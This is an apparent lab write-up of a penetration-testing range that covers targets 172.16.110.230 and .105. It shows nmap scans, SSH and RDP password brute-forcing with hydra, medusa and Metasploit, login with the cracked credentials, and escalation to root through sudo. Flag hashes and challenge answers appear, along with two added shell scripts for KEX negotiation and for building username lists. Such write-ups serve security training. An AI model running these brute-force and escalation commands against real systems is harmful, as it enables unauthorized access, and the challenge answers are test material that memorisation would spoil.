OT Range 20230319
Challenges: (the challenge prompts were screenshots that are not preserved; their text is reproduced under Challenge 37 to 40 below)
Start with the CTF part. First target, 110.230:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.110.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 21:38 EDT
Nmap scan report for 172.16.110.230
Host is up (0.037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 35.63 seconds
┌──(root㉿kali)-[~]
└─# nmap -p22,80,443 -sC -sV -O -A 172.16.110.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 21:40 EDT
Nmap scan report for 172.16.110.230
Host is up (0.49s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6e6ba176158bd429069bd370c599c6b1 (RSA)
| 256 d250a7902067877baf9f6ca3a949d537 (ECDSA)
|_ 256 b7ee598a140ff88df71e1d6c6b975ec9 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1)
|_http-server-header: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Welcome to XAMPP
|_Requested resource was http://172.16.110.230/dashboard/
443/tcp open ssl/http Apache httpd 2.4.52 ((Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after: 2010-09-30T09:10:30
| http-title: Welcome to XAMPP
|_Requested resource was https://172.16.110.230/dashboard/
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.36 seconds
From the scan, 110.230 exposes SSH (22) and an XAMPP Apache on 80/443 (note the default XAMPP self-signed certificate, expired since 2010). The OS fingerprint (Cisco VoIP / Linux 2.6) is unreliable, as nmap itself warns; the OpenSSH 8.2p1 Ubuntu-4ubuntu0.3 banner is the Ubuntu 20.04 package, which the login banner later confirms. Try brute-forcing SSH first:
┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 22:13:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[ERROR] could not connect to ssh://172.16.110.230:22 - ssh_set_client_kex: Out of memory
┌──(root㉿kali)-[~]
└─# cd .ssh
┌──(root㉿kali)-[~/.ssh]
└─# ls
config known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# vim config
That failed, apparently because of the client-side SSH config, so adjust the settings (hydra's libssh backend reads ~/.ssh/config too, as the changing client algorithm lists below show):
┌──(root㉿kali)-[~/.ssh]
└─# ssh aaa@172.16.110.230
/root/.ssh/config line 4: Bad key types 'ED25519,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256'.
/root/.ssh/config: terminating, 1 bad configuration options
Open the config and add the following (screenshot not preserved). Note what the error above says: "Bad key types" is OpenSSH's complaint for the host-key options (HostKeyAlgorithms / PubkeyAcceptedKeyTypes), not for KexAlgorithms, and ED25519 is a key type, not a key-exchange method, so the list was placed on the wrong option.
Started the brute force again; it still fails, now with a key-exchange mismatch (the client offers only the two SHA-1 Diffie-Hellman groups and the server accepts none of them):
┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 22:21:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[ERROR] could not connect to ssh://172.16.110.230:22 - kex error : no match for method kex algos: server [curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256], client [diffie-hellman-group1-sha1,diffie-hellman-group14-sha1]
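The error above is not a tool bug but plain SSH negotiation: the server chooses the first method in the client's list that it also offers, and here there is none. The following is an added example (not from the original write-up) that replays that negotiation on the two lists hydra printed, so the problem can be confirmed and fixed in ~/.ssh/config instead of by patching a library. The "sane" client list is an assumed, trimmed version of what a stock OpenSSH client offers; in practice you would feed `ssh -Q kex` (local client support) and `nmap -p22 --script ssh2-enum-algos <host>` (server offer).

```shell
#!/bin/sh
# Added example, not from the original write-up: replay SSH key-exchange
# negotiation for the two lists hydra printed, so the failure can be explained
# (and fixed in ~/.ssh/config) without patching any tool.
#
# Per RFC 4253 section 7.1 the chosen KEX method is the first entry in the
# CLIENT's list that the server also offers; if there is none the connection
# is dropped, which is the "no match for method kex algos" error above.
#
# Real inputs: `ssh -Q kex` prints what the local OpenSSH supports and
# `nmap -p22 --script ssh2-enum-algos <host>` prints what the server offers.

# Lists copied verbatim from the hydra error message above.
SERVER_KEX='curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256'
CLIENT_KEX_BROKEN='diffie-hellman-group1-sha1,diffie-hellman-group14-sha1'
# Assumed sane client list (a trimmed stock OpenSSH offer), for comparison.
CLIENT_KEX_OK='curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha256'

# negotiate_kex CLIENT_LIST SERVER_LIST
# Prints the negotiated method (client preference order wins), or prints
# nothing and returns 1 when the two lists have no method in common.
negotiate_kex() {
    for c in $(printf '%s' "$1" | tr ',' ' '); do
        for s in $(printf '%s' "$2" | tr ',' ' '); do
            if [ "$c" = "$s" ]; then
                printf '%s\n' "$c"
                return 0
            fi
        done
    done
    return 1
}

# Demo: the broken client list negotiates nothing, the sane one works.
if chosen=$(negotiate_kex "$CLIENT_KEX_BROKEN" "$SERVER_KEX"); then
    echo "broken client list negotiated: $chosen"
else
    echo "broken client list: no common KEX method (connection would fail)"
fi
echo "sane client list negotiated: $(negotiate_kex "$CLIENT_KEX_OK" "$SERVER_KEX")"
```

The practical fix this points to is the one the write-up eventually lands on: remove the restrictive entries from ~/.ssh/config (or set KexAlgorithms to methods the server actually offers) rather than forcing SHA-1 groups that OpenSSH 8.x no longer enables by default.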
Googled "ruby ssh algorithm".
Take a look (screenshot not preserved).
Find the local file and edit it. Note that this is net-ssh, the Ruby SSH library vendored into Metasploit; editing it only affects msf modules, not hydra, which is C and uses libssh:
┌──(root㉿kali)-[~/.ssh]
└─# find / -name algorithms.rb
find: ‘/run/user/116/gvfs’: Permission denied
find: ‘/run/user/1000/doc’: Permission denied
find: ‘/run/user/1000/gvfs’: Permission denied
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
┌──(root㉿kali)-[~/.ssh]
└─# vim /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
Change the marked lines (screenshots of the edit not preserved).
Not sure whether that edit actually took effect; rather than fight with hydra, tried msf's ssh_login directly:
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/LPT_day3/Usernames-CPENT.txt
user_file => /home/kali/LPT_day3/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/LPT_day3/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day3/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.110.230
rhosts => 172.16.110.230
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.110.230:22 - Starting bruteforce
[-] Auxiliary failed: NoMethodError undefined method `new' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:443:in `exchange_keys'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:251:in `proceed!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:190:in `accept_kexinit'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/session.rb:210:in `block in poll_message'
Still throwing errors, and it keeps erroring. The NoMethodError at algorithms.rb:443 (exchange_keys calling .new on nil) means the KEX name selected after the edit has no implementation class behind it in net-ssh's Kex::MAP, i.e. the hand edit broke the algorithm table rather than adding support. Retried with the options set again:
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.110.230
rhosts => 172.16.110.230
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/Usernames-CPENT.txt
user_file => /home/kali/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/Pa
pass_file => /home/kali/Pa
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/Passwords-CPENT.txt
pass_file => /home/kali/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
Reverted the 172.16.110.230-related entries in ~/.ssh/config, and in the end medusa's ssh module (-M ssh) brute-forced it successfully (again run on the VM itself, not through MobaXterm). The first command and the [smbnt] lines below were pasted from a separate run against 172.16.170.90; the lines that matter are the [ssh] ones against 172.16.110.230:
┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 12345678 (3 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: diamond (4 of 51 complete)
...
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: kevin (5 of 34, 4 complete) Password: Pa$$w0rd (28 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: kevin (5 of 34, 4 complete) Password: Pa$$w0rd123 (29 of 51 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.110.230 User: kevin Password: Pa$$w0rd123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: vagrant (6 of 34, 5 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: vagrant (6 of 34, 5 complete) Password: password (2 of 51 complete)
...
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: cpent (28 of 34, 27 complete) Password: Pa$$w0rd123 (29 of 51 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.110.230 User: cpent Password: Pa$$w0rd123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: 12345678 (3 of 51 complete)
...
Credentials: cpent / Pa$$w0rd123 (medusa also found kevin with the same password):
┌──(root㉿kali)-[~/.ssh]
└─# ssh cpent@172.16.110.230
cpent@172.16.110.230's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 04 Apr 2023 05:19:19 AM UTC
System load: 0.0 Processes: 154
Usage of /: 12.0% of 61.51GB Users logged in: 1
Memory usage: 22% IPv4 address for eth0: 172.16.110.230
Swap usage: 0%
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Mar 19 04:04:45 2023 from 172.16.253.15
cpent@BWA-OT:~$
Dump the password file:
cpent@BWA-OT:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jason:x:1000:1000:jason:/home/jason:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kevin:x:1001:1001:,,,:/home/kevin:/bin/bash
mysql:x:997:1002::/home/mysql:/bin/sh
cpent:x:1002:1003:,,,:/home/cpent:/bin/bash
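The dump above is the usual source for a targeted username list: uid 0 plus the human accounts at uid 1000 and up that have a real shell. The following is an added example (not from the original write-up) that pulls those out with awk; the sample is a subset of the /etc/passwd lines shown above, embedded so it runs offline, and on the box you would simply point it at /etc/passwd.

```shell
#!/bin/sh
# Added example, not from the original write-up: list the accounts worth
# brute-forcing from an /etc/passwd dump. Sample lines copied from the dump
# above; on the target run: interactive_users /etc/passwd

# Constructed sample: a subset of the /etc/passwd printed in the write-up.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jason:x:1000:1000:jason:/home/jason:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kevin:x:1001:1001:,,,:/home/kevin:/bin/bash
mysql:x:997:1002::/home/mysql:/bin/sh
cpent:x:1002:1003:,,,:/home/cpent:/bin/bash'

# interactive_users FILE
# Prints "name uid shell" for uid 0 and for human accounts (uid >= 1000, the
# Debian/Ubuntu UID_MIN) whose shell is not nologin/false/sync.
# mysql (uid 997, /bin/sh) is excluded by the UID rule; a service account with
# a real shell like that is still worth a manual look.
interactive_users() {
    awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false|sync)$/ { print $1, $3, $7 }' "$1"
}

# user_wordlist FILE
# Just the names, one per line, ready for hydra -L / medusa -U / crowbar -U.
user_wordlist() {
    interactive_users "$1" | awk '{ print $1 }'
}

# Demo on the embedded sample.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
echo "interactive accounts:"
interactive_users "$tmp"
echo "wordlist:"
user_wordlist "$tmp"
rm -f "$tmp"
```

Group membership (kevin's sudo group 27, seen later via id) is not in /etc/passwd; check /etc/group or run id once you have a shell.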
So kevin (and jason) also exist. The following was not run on my own VM:
┌──(root💀kali)-[~]
└─# hydra -l kevin -P /home/kali/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 01:26:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 52 login tries (l:1/p:52), ~4 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[22][ssh] host: 172.16.110.230 login: kevin password: Pa$$w0rd123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 01:26:36
Later, testing again with ssh_login on my own box:
msf6 auxiliary(scanner/ssh/ssh_enumusers) > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /home/kali/LPT_day3/Passwords-CPENT.txt no File containing passwords, one per line
RHOSTS 172.16.110.230 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali/LPT_day3/Usernames-CPENT.txt no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.110.230:22 - Starting bruteforce
[+] 172.16.110.230:22 - Success: 'kevin:Pa$$w0rd123' 'uid=1001(kevin) gid=1001(kevin) groups=1001(kevin),27(sudo) Linux BWA-OT.CPENT.LOCALNET 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.4:40413 -> 172.16.110.230:22) at 2023-04-09 02:06:08 -0400
ssh_login found kevin directly (note the Success line already shows kevin is in group 27, sudo) and did not find cpent, so just log in as kevin below:
┌──(root㉿kali)-[~/.ssh]
└─# ssh kevin@172.16.110.230
kevin@172.16.110.230's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 04 Apr 2023 05:29:03 AM UTC
System load: 0.03 Processes: 154
Usage of /: 12.0% of 61.51GB Users logged in: 1
Memory usage: 22% IPv4 address for eth0: 172.16.110.230
Swap usage: 0%
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 19 04:07:01 2023 from 172.16.253.15
kevin@BWA-OT:~$ pwd
/home/kevin
You could run linpeas, but the following two commands are enough here:
kevin@BWA-OT:~$ id
uid=1001(kevin) gid=1001(kevin) groups=1001(kevin),27(sudo)
kevin@BWA-OT:~$ sudo -l
sudo: unable to resolve host BWA-OT.CPENT.LOCALNET: Temporary failure in name resolution
[sudo] password for kevin:
Sorry, try again.
[sudo] password for kevin:
Matching Defaults entries for kevin on BWA-OT:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kevin may run the following commands on BWA-OT:
(ALL : ALL) ALL
(ALL : ALL) ALL
(ALL : ALL) ALL means kevin may run any command as any user and group, so sudo -i with kevin's own password gives a root shell directly (the rule appears twice because kevin matches both a user entry and the sudo group entry). The "unable to resolve host" message is harmless: the hostname is simply missing from /etc/hosts.
kevin@BWA-OT:~$ sudo -i
sudo: unable to resolve host BWA-OT.CPENT.LOCALNET: Temporary failure in name resolution
[sudo] password for kevin:
root@BWA-OT:~# find / -name rootflag.txt -print 2>/dev/null
/root/rootflag.txt
root@BWA-OT:~# cat /root/rootflag.txt
OTRoot-8125
root@BWA-OT:~# md5sum /root/rootflag.txt
24f87e1c12f8ecf4c6eacbf934377ee5 /root/rootflag.txt
Challenge 38: (60 Points)
Escalate your privilege to that of a Root user in the 192.168.110.230 machine, locate rootflag.txt and submit the last 6 hex digits of the md5 hash the file.
Ans: 377ee5
root@BWA-OT:~# cd /home
root@BWA-OT:/home# ls
cpent jason kevin
root@BWA-OT:/home# cd kevin/
root@BWA-OT:/home/kevin# ls
snap userflag.txt
root@BWA-OT:/home/kevin# cat userflag.txt
OTUser-5123
root@BWA-OT:/home/kevin# md5sum userflag.txt
c1dc90228bcce6ab598e070e8aa390d2 userflag.txt
Challenge 37: (40 Points)
Compromise the 192.168.110.230 machine to gain user-level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: A390D2
Next target, 110.105:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.110.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 23:38 EDT
Nmap scan report for 172.16.110.105
Host is up (0.036s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 368.38 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,3389,5985,47001,49664-49670 -sC -sV -O -A 172.16.110.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 23:46 EDT
Nmap scan report for 172.16.110.105
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HPDDJG3FLDO
| Not valid before: 2023-03-18T02:58:49
|_Not valid after: 2023-09-17T02:58:49
|_ssl-date: 2023-04-04T03:48:37+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.96 seconds
Brute-force with hydra. Against RDP (3389) this ran at roughly 500 tries/min with -t 4 and got through all 1820 combinations in about four minutes; SSH is usually the slower target because sshd caps concurrent unauthenticated connections (MaxStartups), which is why hydra recommends -t 4 there. Note hydra marks its rdp module experimental, and the "freerdp: The connection failed to establish" errors below come from it. The run below was on the remote host; on my own VM it errors and needs fixing.
┌──(root💀kali)-[~]
└─# hydra -L /home/kali/Usernames-CPENT.txt -P /home/kali/Passwords-CPENT.txt rdp://172.16.110.105 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 00:05:03
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.110.105:3389/
[3389][rdp] host: 172.16.110.105 login: kevin password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
[STATUS] 508.00 tries/min, 508 tries in 00:01h, 1318 to do in 00:03h, 4 active
[STATUS] 469.00 tries/min, 1407 tries in 00:03h, 422 to do in 00:01h, 4 active
[3389][rdp] host: 172.16.110.105 login: cpent password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 00:09:00
Later, crowbar on my own VM finally worked; remember to run it from the VM's own terminal, not through MobaXterm.
